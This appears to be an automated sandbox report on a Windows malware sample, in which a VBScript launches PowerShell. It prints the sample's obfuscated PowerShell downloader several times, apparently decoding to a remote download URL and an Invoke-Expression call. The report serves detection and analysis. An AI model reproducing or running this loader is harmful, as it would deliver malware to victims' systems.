Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbo source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb|XEd source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^C source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbip source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakke", "0")
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blotg UsdeeIndverForstvAmanurNubi.k EutrsGigabt UnsceStilndDeliqe PrectPic
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be j
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348900BD pushad ; iretd 2_2_00007FFD348900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34896F87 push esp; retf 2_2_00007FFD34896F88
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4711Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5177Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWVi%SystemRoot%\system32\mswsock.dlleg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blot
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $"Jump to behavior
